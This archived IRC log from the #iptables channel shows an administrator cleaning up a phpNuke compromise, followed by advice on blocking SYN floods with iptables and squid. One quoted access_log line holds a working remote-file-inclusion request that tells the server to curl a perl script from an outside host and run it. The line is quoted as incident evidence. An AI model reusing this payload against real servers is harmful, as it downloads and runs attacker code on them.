IRC Logs

Network: freenode Channel: #iptables

	Enter your search terms Submit search form
	Web www.irclog.org

[00:15]<vyrn-vnzsr>killermach: you get it working?
[00:15]<-- 2yd2nzy xrs fuyv>http://iownmymusic.org/ http://iownmydvds.org/")
[00:17]<mzwjjpnz>Are there any experts avialable to ask a question to
[00:17]<ayffnzdrax>vice-versa: I'm still battling the intrusion.. I have access and /var/log/firewall is dropping GOBS of packets... so hopfully I'm the only one w/ access
[00:18]<mzwjjpnz> I have rather complex question. I am looking to see if there is a way with iptables to minic on cisco the tcp-intercept command, where as the iptables firewall box will recieve the pack and if it is open for more than 10 seconds it will close teh connection and send a reset to the host it is protecting. note: firewall is not the same box as the host
[00:18]<ayffnzdrax>I have a httpsl (many) running, their not mine.. and an httpslx (single instance) they keep respawning and
[00:19]<ayffnzdrax>locate and find do no show me where the files actually are.. any help ?
[00:28]<vyrn-vnzsr>killermach: chkrootkit ?
[00:29]<wjjmmwjjmlnacnz>killermach: You can use find or lsof to locate your log files.
[00:30]<ayffnzdrax>find doesn't locate httpsl, httpslx or httpsd
[00:30]<wjjmmwjjmlnacnz>I thought he wanted log files searched?
[00:30]<wjjmmwjjmlnacnz>*searched for?
[00:31]<wjjmmwjjmlnacnz>Hm, maybe misunderstood.
[00:33]<vyrn-vnzsr>killermach: get the pid of the process and ls -l /proc/thepid
[00:37]<vyrn-vnzsr>killermach: any joy?
[00:38]<ayffnzdrax>ls -al /proc/pid says the exe -> /usr/bin/perl and I have chmod 000 that file
[00:38]<ayffnzdrax>still doesn't help locate the source
[00:39]<ayffnzdrax>the original intrusion was via /tmp/ directory when a php exploit wrote files there. I've chmod'd them 000 also
[00:39]<vyrn-vnzsr>aye
[00:45]<ayffnzdrax>now I have them dieing off, down from 274 processes to 101, and dropping.. but I need to locate where they are running from
[00:45]<ayffnzdrax>I'm not rooted btw.. all these are apache processes
[00:49]<ayffnzdrax>anyother ways to find out the actual filename and location for these processes?
[00:50]<ayffnzdrax>WoodyWoodpecker: I have log files open.. yes.. reviewing them now
[00:54]<vyrn-vnzsr>killermach: ps aux ??
[00:59]<ayffnzdrax>vice-versa:
[01:00]<ayffnzdrax>vice-versa: I figured it out
[01:00]<ayffnzdrax>these are all being launched from the original perlscript that was uploaded to /tmp
[01:00]<ayffnzdrax>now I need to find out how to keep them from respawning
[01:00]<ayffnzdrax>kill them off
[01:06]<ayffnzdrax>ok.. I think they are all dead
[01:06]<ayffnzdrax>now time to plug the hole that let them in
[01:06]<ayffnzdrax>then put humpty back together again
[01:11]<vyrn-vnzsr>killermach: is this you're own php code or some package the exploited
[01:11]<vyrn-vnzsr>*they
[01:12]<ayffnzdrax>vice-versa: no.. it's not mine.. it's phpnuke.. the plague of the web admin
[01:15]<ayffnzdrax>here is the log line (one of them anyhow)
[01:15]<ayffnzdrax>access_log:hal9000.mi.infn.it - - [05/Jul/2006:15:06:52 -0400] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.ithose.com/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%20http://gerichtssall.net/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? HTTP/1.0" 200 11757 "-" "Mozilla/5.0"
[01:27]<ayffnzdrax>vice-versa: ok.. I'm up again
[01:30]<ayffnzdrax>two hours.. hmm.. not bad for a one man show
[01:37]<mzwjjpnz> I have rather complex question. I am looking to see if there is a way with iptables to minic on cisco the tcp-intercept command, where as the iptables firewall box will recieve the pack and if it is open for more than 10 seconds it will close teh connection and send a reset to the host it is protecting. note: firewall is not the same box as the host
[01:37]<drwygn>i already had it that way, MrWoofer.
[01:38]<mzwjjpnz>you had it?
[02:36]<unix9all>Hi all
[02:36]<unix9all>I have a problem, I searched google and a lot of manuals and I dont find the solution ( And I think that it must be easy ).
[02:39]<unix9all>I have 1 router, with all ports opens to one linux machine, this machine acts as a AP, well, I want to redirect all ports to one machine connected via the AP, I want to this machine have all the ports open and accesible via internet, anyone knows how ?
[03:10]<vyrn-vnzsr>killermach: so it was phpbb that was exploited?
[03:12]<vyrn-vnzsr>maxine: don't be messing with MrWoofer now...
[03:12]<drwygn>vice-versa: what?
[03:13]<vyrn-vnzsr>maxine: you heard me!
[03:13]<drwygn>vice-versa: excuse me?
[03:15]<mrrynfmr>MrWoofer: this is to prevent SYN floods?
[03:16]<mrrynfmr>if you have a kernel 2.6.14+, you could set the ip_conntrack_tcp_timeout_syn_sent to 10 seconds, and have a daemon listen to the conntrack DELETE events, sending an RST for each one
[03:17]<mrrynfmr>hmm - actually, you'd want to change _syn_rcv too
[03:18]<mrrynfmr>maxine: shut up
[03:18]<drwygn>danieldg: excuse me?
[03:18]<mrrynfmr>hmm, I thought that was a command...
[03:27]<mzwjjpnz>welll what i am looking to do is to once we idneity a syn flood block all bad syns and authicate good syns and kill any open syns requets on the destination machine that might be left bad
[03:29]<mzwjjpnz>i.e syn requests come in we block it,, it comes again, identical one that is, we allow it through, since it is valid
[03:29]<mrrynfmr>oh - maybe look at -m recent?
[03:30]<mrrynfmr>maybe use recent in the raw table, so the first packet goes to NOTRACK (or directly to DROP), and the second is the first one seen by conntrack
[03:30]<mzwjjpnz>Well that might work. i want to mwatch not only the ip but the syn..
[03:31]<mrrynfmr>by "the syn" you mean the sequence number?
[03:31]<mzwjjpnz>Yes, i believe os
[03:31]<mzwjjpnz>if someeone is attacking you,, syn wise, we need to be able to someone allow good in and keep teh bad out
[03:31]<mrrynfmr>I think you'd have to write your own module to do that
[03:31]<mrrynfmr>can you proxy the connections?
[03:32]<mzwjjpnz>one method i "believe" is dropping the first syn, wait for it to represent itself it it does, white list the ip
[03:32]<mzwjjpnz>if it just keeps sending syns drop
[03:32]<mzwjjpnz>proxy? in what way
[03:32]<mrrynfmr>syncookies would let linux handle the connections - I assume the server doesn't support them
[03:32]<mzwjjpnz>this is going to be a transparenet firewall bridge
[03:32]<mzwjjpnz>going to protect a bunch of boxes
[03:33]<mzwjjpnz>from various customers
[03:33]<mrrynfmr>there are transparent proxies, if it's HTTP
[03:33]<mzwjjpnz>ok so what would we proxy and why would we proxy it
[03:34]<mrrynfmr>you would just proxy to intercept the connection - basically you recieve each packet and send the TCP stream out
[03:34]<mrrynfmr>so, your firewall would be getting hit by the SYN flood, not the hosts behind it
[03:34]<mzwjjpnz>right but we are already intercepting by being inline
[03:34]<mrrynfmr>yes, but you're not rewriting the TCP stream
[03:35]<mzwjjpnz>Ok. so we absorb the syn flood
[03:35]<mzwjjpnz>so how do we know which packets to let through
[03:36]<mrrynfmr>on an established connection (SYN, SYN/ACK from firewall, ACK), then your firewall connects to the real server
[03:36]<mzwjjpnz>why need the proxy at all just block the non-established ones
[03:36]<mrrynfmr>because you don't know which ones are established
[03:37]<mrrynfmr>and once you find out in this way, it's connected to a socket on the firewall
[03:37]<mzwjjpnz>Ok so, bad traffic comes in on a syn flood, firwall redirects to squid.. squid then recevices packets, if they ack it,, we then redirect it to the destiatnion
[03:38]<mrrynfmr>yes
[03:38]<mzwjjpnz>Any idea how to write the iptable rule for that ?
[03:38]<mrrynfmr>you'd use REDIRECT to send all packets to squid
[03:38]<mzwjjpnz>i get that part..
[03:38]<mzwjjpnz>example:
[03:38]<mzwjjpnz>iptables -t nat -A PREROUTING -i eth1 -p tcp –dport 80 -j DNAT –to 192.168.1.1:3128
[03:38]<mzwjjpnz>iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j REDIRECT –to-port 3128
[03:39]<mzwjjpnz>assuming squid is on port 3128
[03:39]<mrrynfmr>use the second one
[03:39]<mzwjjpnz>Ok
[03:40]<mzwjjpnz>ok now how do i get it to go to the destination once we valid it, and what are the rules to validate it
[03:40]<mrrynfmr>squid will take care of getting it to the destination
[03:41]<mrrynfmr>actually, you don't use the firewall to validate it - you let the linux kernel do that

Back to #iptables
Or go to some related logs:
#suse
#gentoo
#gentoo
#blender
#debian